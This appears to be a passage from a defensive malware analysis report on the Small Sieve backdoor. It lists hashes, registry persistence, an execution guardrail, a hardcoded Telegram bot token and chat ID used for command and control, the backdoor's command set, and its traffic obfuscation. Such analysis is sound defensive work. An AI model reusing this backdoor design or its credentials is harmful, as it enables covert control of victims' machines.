Index.exe Metadata_\n\nFilename | index.exe \n---|--- \n**Description** | The final PyInstaller-bundled Python 3.9 backdoor \n**Size** | 17263089 bytes \n**MD5** | 5763530f25ed0ec08fb26a30c04009f1 \n**SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992 \n**SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2 \n**Compile Time** | 2021-08-01 04:39:46 UTC \n \n#### \n\n#### **Functionality **\n\n##### **_Installation _**\n\nSmall Sieve is distributed as a large (16MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user\u2019s `AppData/Roaming` directory and is added as a Run key in the registry to enabled persistence after reboot. \n\nThe installer then executes the backdoor with the \u201cPlatypus\u201d argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the registry persistence key: `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`. \n\n##### **_Configuration _**\n\nThe backdoor attempts to restore previously initialized session data from `%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt`. \n\nIf this file does not exist, then it uses the hardcoded values listed in table 4:\n\n_Table 4: Credentials and Session Values_\n\nField | **Value** | **Description** \n---|---|--- \nChat ID | 2090761833 | This is the Telegram Channel ID that beacons are sent to, and, from which, tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed. \nBot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware. \nTelegram Token | 2003026094: AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API. \n \n#### \n\n#### **Tasking **\n\nSmall Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host\u2019s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a Telegram bot using the** python-telegram-bot** module. \n\nTwo task formats are supported: \n\n * `/start `\u2013 no argument is passed; this causes the beacon information to be repeated. \n * `/com[BotID] [command]` \u2013 for issuing commands passed in the argument. \n\nThe following commands are supported by the second of these formats, as described in table 5: \n\n_Table 5: Supported Commands_\n\nCommand | Description \n---|--- \ndelete | This command causes the backdoor to exit; it does not remove persistence. \ndownload **url\u201d\u201dfilename** | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function. \nchange token**\u201d\u201dnewtoken** | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file. \ndisconnect | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued. \n \nAny commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.\n\n#### **Defense Evasion **\n\n##### **_Anti-Sandbox _**\n\n##### \n\n_Figure 1: Execution Guardrail_\n\nThreat actors may be attempting to thwart simple analysis by not passing \u201cPlatypus\u201d on the command line. \n\n##### **_String obfuscation _**\n\nInternal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included in Appendix B.\n\n#### **Communications **\n\n##### **_Beacon Format _**\n\nBefore listening for tasking using CommandHandler objects from the python`-telegram-bot `module, a beacon is generated manually using the standard `requests` library:\n\n\n\n_Figure 2: Manually Generated Beacon_\n\nThe hex host data is encoded using the byte shuffling algorithm as described in the \u201cCommunications (Traffic obfuscation)\u201d section of this report. The example in figure 2 decodes to: \n\n`admin/WINDOMAIN1 | 10.17.32.18`\n\n##### \n\n##### _**Traffic obfuscation **_\n\nAlthough traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.\n\n![](image/png;base64,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